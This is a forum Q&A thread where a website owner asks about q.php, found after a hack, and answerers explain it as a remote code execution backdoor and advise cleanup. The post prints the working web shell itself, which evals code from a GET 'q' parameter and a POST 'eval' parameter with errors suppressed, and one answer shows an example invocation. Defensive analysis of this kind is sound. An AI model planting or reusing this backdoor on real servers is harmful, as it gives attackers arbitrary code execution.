# hacked website unusual php file

Tags: php

I have a file called q.php that has appeared in one of my websites. The site has been hacked. does anyone know what the file does?

```
    <? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>
```

Comment: It conveniences executing remote code (without additional uploading, what apparently is also possible already).

Answer (score 9):

It looks like it lets anyone execute php code that is passed in as a 'q' parameter in a get request, or any code in 'eval' param of a POST request.  It suppress all associated errors.

This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.

Answer (score 1):

It runs the PHP code sent in the ?q= GET argument or the POST eval argument.

I would advice you to clean up your server and start from a clean installation again.

Answer (score 1):

It will enable the attacker to execute any code.

If you pass code to that script either by `?q=code` in the URL or by including it into a POST-Request into the `eval` parameter it will get executed.

So basically this is a remote code execution backdoor.

Answer (score 1):

Nice.  Not sure what the first line is for, but the two `eval` lines allow someone to execute any code they please on your server by passing it in the url or post data respectively.

Comment: My guess is that it loads an html file with a directory listing or some common functions they want to run.

Comment: @MetalFrog nah, echo just spits out the string.  My money's on script kiddies who don't really know what they're doing

Comment: Oh, right, no idea why I thought that was a require or include earlier. Derp moment.

Answer (score 1):

The bigger question is how were the attackers able to upload the file in the first place. What that file contains is quite typical of code that is inserted so that attackers are able to execute code on your server without permission.

Merely deleting this file and any other files with rogue code in them is not fixing the problem, which is somehow attackers are able to upload files into your websites file repository.

At any rate, here is a complete breakdown:

1/ error_reporting(0);
Sets the error reporting to off.

2/ if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with /?wpth on the end, the URL is echo'd at the top of the page.

3/ 
This will execute any code included in the value of q. i.e. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)

4/ if (!isset($_POST['eval'])) {die('');}
Kill the page execution if a post form variable called eval is not set.

5/ eval($_POST['eval']);
Execute any code posted from a remoted hosted form where the form variable is called eval